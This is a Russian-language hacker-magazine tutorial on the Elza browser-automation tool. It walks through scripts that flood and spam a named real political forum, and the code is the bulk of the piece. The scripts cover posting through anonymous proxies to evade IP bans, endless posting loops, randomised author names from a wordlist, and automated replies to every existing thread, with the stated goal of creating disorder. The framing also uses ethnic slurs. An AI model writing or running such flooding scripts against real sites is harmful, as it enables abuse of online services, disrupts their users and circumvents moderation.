О да! Велик и могуч славянский народ и Аллах с Буддой, и иже с ними. Сегодня у нас по программе, величайшая весЧ с очаровательным названием — Elza. Эльза, Эльза, Эльзочка, лапушка, дитятко
всеми уважаемого Филиппа Стоева. Подробнее о Филиппе можно узнать по адресу
http://www.stoev.org/, но мы не мудрствуя, ликуя, перейдём к делу.

Для тех, кто с Ельзой не знаком, вступление. Остальные могут быть так добры и переходить к написанию «Я первый» в обсуждении. Ельза — программа, способная имитировать поведение фактически любого браузера (IExplorer, Netscape etc etc), включая приём, изменение и отправление cookie, передачу всех невидимых элементов, таких как Referer, User-Agent и, ессесссно, возможность автоматизации всех необходимых процессов. Так как предыдущая фраза
выглядит ужасно непонятно, даже для меня через минуту после того, как я это написал, то, полагаю, самым приятным способом познакомиться с Эльзочкой будет пример. Причём пример весьма воинственный — целью будет
http://www.nationalism.org/! Не простим поганцам обЫдного названия жЫдохакер (это
ж сколько фантазии надо вкладывать, чтоб всех неугодных именовать с приставкой жЫд.) 

Для того что бы приготовить термоядерный коктейль, нам потребуются
ниже перечисленные компоненты:

1) ActivePerl http://www.activestate.com/ActivePerl/
(Обязательно)

2) Elza http://phiphi.hypermart.net/pub/elza-1.4.7-beta.zip.
Последняя стабильная версия 1.4.4, но 1.4.7 работает быстрее, и на взглючинки я пока не натыкался. (Само собой обязательно)

3) Stunnel http://www.stunnel.org/download/binaries.html
(Обязательно. На странице так же есть необходимые
DLL)

4) Текстовый редактор а-ля Notepad. Порекомендую EditPad
http://www.editpadlite.com/zips/SetupEditPadLite.exe
(Необязательно, но удобно)

5) Что-нибудь для тестирования проксей. MultiProxy вполне подходит
http://www.multiproxy.org/mproxy12.zip
(Необязательно)

Начнём-с.. Для начала установим Perl. Особенного в оной установке нет ничего, и заостряться на этом не будем. Эльза и Stunnel устанавливаются ещё проще, создание директории и распаковка туда .zip файлов затруднений вызывать не должна. Замечательно. Мы почти готовы, вот только Эльзу надо ещё ласково отконфигурировать и тогда уххх! Нет слов — сплошной оргазм.

Открываем файл elza.def, смотрим. Внимательно смотрим. Находим следующую строчку

$DEF{‘sslapp’} = «C:\\win-util\\stunnel.exe»;

и заменяем на

$DEF{‘sslapp’} = «.\\stunnel.exe»;

С учётом того, что Эльза и Stunnel находятся в одной директории. Теперь для удобства в этой же директории можно сделать BAT файл. Обзовём его Elza.bat, и впишем туда одну строчку:

[директория-к-перлу]\bin\perl elza.pl -s %1 %2 %3 %4 %5 %6 %7 %8 %9

Для ОСОБЕННО одарённых товарищей: [директория-к-перлу]
— это то место, куда мы установили
ActivePerl :)).

Всё. Лаборатория готова, перейдём к созданию скрипта. Да, чуть было на позабыл! Доставать нацЫков мы будем через их чудесную гавкалку, кою коллеги уже слегка раздраконили давеча, да так,
что пришлось лысым админам в ужасе ставить новый форум. Но в одном они всё равно просчитались — сообщения можно оставлять без авторизированной регистрации, а значит lets flood and spam hell out of
them.

Тэкс. Где этот лысый форум? URL — http://pravo.org/forum/ Смотрим. Сразу сообщения на этой же странице нам оставить не дадут, но не особенно-то и
хотелось. Жмём дальше «Новая тема», что уносит нас на http://pravo.org/forum/post.php?f=1 А зачем нам вообще список всех тем? Не, нам кузнец не нужен (Кстати, меня там уже забанили. Наивные нацЫки, полагают что кого-то можно банить по IP. Хех)
Значится так http://pravo.org/forum/post.php?f=1 — оно не меняется, и мы злорадно могём флудить и спамить с одного и того же места, без излишних испражнений. 

Сохраняем оную страницу для просмотра и ищем <FORM (По логике, форма должна
начинаться с этого тэга, и это то, что нас интересует!) Опа.. Нашлося. 

Всё! Хватит болтать! К делу! Создадим файл — fnazi.elz, и впишем туда:

var proxy = ###.###.###.### ##
get url http://pravo.org/forum/post.php?f=1
field %ALL% $
field author = Вася Пупкин
field email = evrei@krugom.com
field subject = Как пройти в библиотеку?
field body = Смотри subj, а так же вопрос, любят ли нацисты плюшевых медвежат, и почему. 
post url post.php

Теперь поподробнее.

1) var proxy = ###.###.###.### ## <- Подсказываем Эльзе, через какой прокси работать. Заметим, что IP и Port следует указывать через пробел, а не двоеточие. Прокси нужен, иначе лысые могут доставить определённые неприятности. Для ОСОБЕННО одарённых — вместо ###.###.###.### ## следует вписать свой анонимный прокси.

2) get url http://pravo.org/forum/post.php?f=1 <- Указываем Эльзе адрес документа, который она должна скачать.

3) field %ALL% $ <- Берём все поля форм из документов. В данном случае это поля t, a, f, p, author, email, subject, body и checkbox (не надо тыкать пальцами, я знаю, что Submit тоже поле)

4,5,6) field something = something <- Устанавливаем поля соответствующе. Следует заметить, что Эльза автоматом переводит строки в UNICODE, так что заботиться о
кириллице не придётся.

7) post url post.php <- В самом начале формы стоит action=»post.php» method=»post».. Следует ли что-то
объяснять?

Запускаем «elsa.bat fnazi.elz», и бегом бежим на форум, смотреть! Если новое сообщение появилось, то всё ОК. Если же нет, то следует призадуматься — работает ли proxy? Если работает, значит вполне возможно, что нацЫсты сменили систему.

Мда. Одно сообщение. Маловато будет однако, надо бы разнообразить это безобразие! Заменяем скрипт на следующий:

var proxy = ###.###.###.### ##
var onerror = continue
label ENDLESSLOOP
get url http://pravo.org/forum/post.php?f=1
field %ALL% $
field author = Вася Пупкин
field email = evrei@krugom.com
field subject = Как пройти в библиотеку?
field body = Смотри subj, а так же вопрос — любят ли нацисты плюшевых медвежат, и почему. 
post url post.php
goto ENDLESSLOOP

Изменений не много:

1) var onerror = continue <- По умолчанию, если Эльза натыкается на ошибку, скрипт останавливается. Нам оно надо?

2) label ENDLESSLOOP <- Определяем начало цикла.

3) goto ENDLESSLOOP <—- Соответственно переходим обратно к началу цикла.

Запускаем, идём на форум и медленно перезагружая страницу стеклянными глазами наблюдаем, как форум плавно наполняется эротично одинаковой лабудой. Круто! Но не очень. Уж больно одинаково всё это выглядит. Попробуем разнообразить? Понадобится wordlist, состоящий из разных слов. (Пример —
word.txt)

var proxy = ###.###.###.### ##
var onerror = continue
call FLOODPROCEDURE NAMEZ % word.txt
proc FLOODPROCEDURE
get url http://pravo.org/forum/post.php?f=1
field %ALL% $
field author = $$NAMEZ$$
field email = $$NAMEZ$$@mail.ru
field subject = $$NAMEZ$$$$NAMEZ$$$$NAMEZ$$$$NAMEZ$$
field body = Меня возбуждают плюшевые мишки!!! А вас?
post url post.php
endproc FLOODPROCEDURE

Данный пример на порядок сложнее.
Рассмотрим-с:

1) call FLOODPROCEDURE NAMEZ % word.txt <- Вызывает процедуру
FLOODPROCEDURE для каждой строчки из файла word.txt, присваивая значение этой строки переменной NAMEZ. Если непонятно, следует перечитать это с начала, так как это одна из наиважнейших функций Эльзы.

2) proc FLOODPROCEDURE <- Объявляем начало процедуры

3) endproc FLOODPROCEDURE <—- Конец процедуры. Всё, что находится между proc и endproc, будет выполняться «много» раз.

4) $$NAMEZ$$ <—- Везде, где Эльза будет натыкаться на это выражение, оно будет заменятся значением переменной NAMEZ.

Запускаем и испытываем небесный оргазм от ещё более
бессмысленной лабудятинки. Но это тоже не предел 🙂 Просто создавать новые темы,
гнусно, вульгарно, а главное, не создаёт то ощущение беспорядка, который бы нам хотелось устроить. И так усложним пример, но сначала вернёмся к форуму и внимательно посмотрим
на него. Если мы просматриваем какую-либо тему, то на той же странице нам дают возможность отписать ответ.
Воспользуемся же этим безобразием! Понадобится немного математики, а точнее, ещё один файл просто с номерами через один. Вроде 1,3,5,7,9,11 и так далее.
Прилагается numbers.txt, содержащий 13,15,17,19,21…9999. Почему с 13? Так надо 🙂 

var proxy = ###.###.###.### ##
var onerror = continue
subst NUMBER % numbers.txt
call FLOODPROCEDURE NAMEZ % word.txt
proc FLOODPROCEDURE
get url http://pravo.org/forum/list.php?f=1
get link number @@NUMBER@@
field %ALL% $
field author = $$NAMEZ$$
field email = $$NAMEZ$$@mail.ru
field subject = О-да! $$NAMEZ$$, ещё $$NAMEZ$$… Охххххх
field body = Меня возбуждают кожаные плюшевые мишки!!! А вас?
post url post.php
endproc FLOODPROCEDURE

Пример стал ещё сложнее, но.. Если внимательно всмотреться, всё получится!

1) subst NUMBER % numbers.txt <- Загружает весь файл numbers.txt в динамический массив
NUMBER. 

2) get link number @@NUMBER@@ <- Эльза позволяет красивые методы, хотя может быть, и непонятно. Эта строка загружает документ, который находится по адресу на который указывает ссылка номер @@NUMBER@@ в нынешнем документе. Следует обратить внимание на следующее — в предыдущих примерах, мы напрямую грузили «Новая Тема», теперь же мы в начале загружаем список всех тем (http://pravo.org/forum/list.php?f=1 теперь, а не
http://pravo.org/forum/post.php?f=1, как раньше), затем выдёргиваем уже существующую тему по номеру ссылки, и пишем ответ. Отсюда стартовый номер 13, чтобы не дёргать попусту «Архивы форума»,
"Nationalism.org", "Pravo.org", a сразу начать с первой темы. А через один номера идут, потому что мы не хотим отвечать на свои же собственные ответы, а Эльза каждый раз будет перезагружать список тем по новой.

Запускаем, получаем сексуальное удовлетворение, такой чудовищной силы, что.. Слов нет описать. Кстати сказать, что метод «через один» далеко не идеален, и вообще в корне не верен… но что за чёрт! Беспорядок-то появляется! Что и следовало доказать.

В заключении хотелось бы сказать несколько вещей:

1) Не то, что бы мне сильно мешали нацЫки. Но за «жыдохакеров» надо бы по носу. Что вообще за обобщение такое?
2) Мощь и могущество Эльзы не использовано на данном примере даже на треть. Это был вводный курс, дальше будет круче 🙂
3) Как можно было судить по тексту, мне очень не хватает девушки 🙂 Милые лапушки, пишите, звоните.. Не дайте подохнуть от своей одинокости и неповторимости 🙂

Оставить мнение

Check Also

Миллионы серверов Exim находятся под атаками из-за свежей уязвимости

Более половины всех почтовых серверов в интернете находятся под угрозой: злоумышленники уж…